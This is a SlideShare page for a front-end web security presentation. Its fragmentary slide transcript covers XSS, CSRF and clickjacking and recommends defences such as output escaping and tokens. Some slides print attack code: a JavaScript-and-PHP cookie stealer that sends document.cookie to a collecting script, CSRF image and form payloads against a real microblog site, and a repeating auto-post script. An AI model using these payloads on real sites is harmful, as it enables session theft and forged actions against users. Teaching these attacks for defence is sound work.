• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
F2e security
 

F2e security

on

  • 2,006 views

 

Statistics

Views

Total Views
2,006
Views on SlideShare
1,892
Embed Views
114

Actions

Likes
17
Downloads
197
Comments
0

3 Embeds 114

http://yinjun622.sinaapp.com 61
http://wiki.ued.taobao.net 52
http://webcache.googleusercontent.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    F2e security F2e security Presentation Transcript

    • 2
    • 3
    • 4
    • • – – –••
    • Cross-site scripting XSS
    • XSS
    • • Cookie• DOM••…
    • Yupoo XSS
    • alert
    • Javascriptvar img = new Image();img.src = get_cookie.php?var=+encodeURI(document.cookie); PHP<?phpif (isset($_GET[var])) { file_put_contents(./cookie/.time()..txt,urldecode($_GET[var]));}
    • “ ”
    • • Filter input,Escape output• Cookie• noscript?
    • ••
    • • http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/archives/2491• http://ha.ckers.org/xss.html• http://www.xssed.com/
    • CSRF Cross Site Request Forgery
    • <img src=“http://.../del.php?id=64” />
    • <form action="http://jiwai.de/wo/status/update" method="post"> <textarea name="jw_status"></textarea> <input type="submit" /> </form>
    • •• GET POST•
    • setInterval(function() { var img = new Image(); var message = ; var api = http://jiwai.de/wo/status/ update; img.src = api + ?jw_status= + message + &t= + +new Date();}, 1000);
    • “ ”
    • • GET POST Cookie• Referer• Token•
    • • _tb_token_• Referer
    • • http://en.wikipedia.org/wiki/Cross-site_request_forgery• http://www.cgisecurity.com/csrf-faq.html• http://www.80sec.com/csrf-securit.html• http://www.playhack.net/view.php?id=31
    • Twitter Clickjacking
    • 1. iframe Twitter 02. “ ”3. Twitter
    • ••
    • CSRF
    • Cookie Session
    • • “JS ”••
    • Q&A
    • alert(/tHx/).replace(/.+/, eval);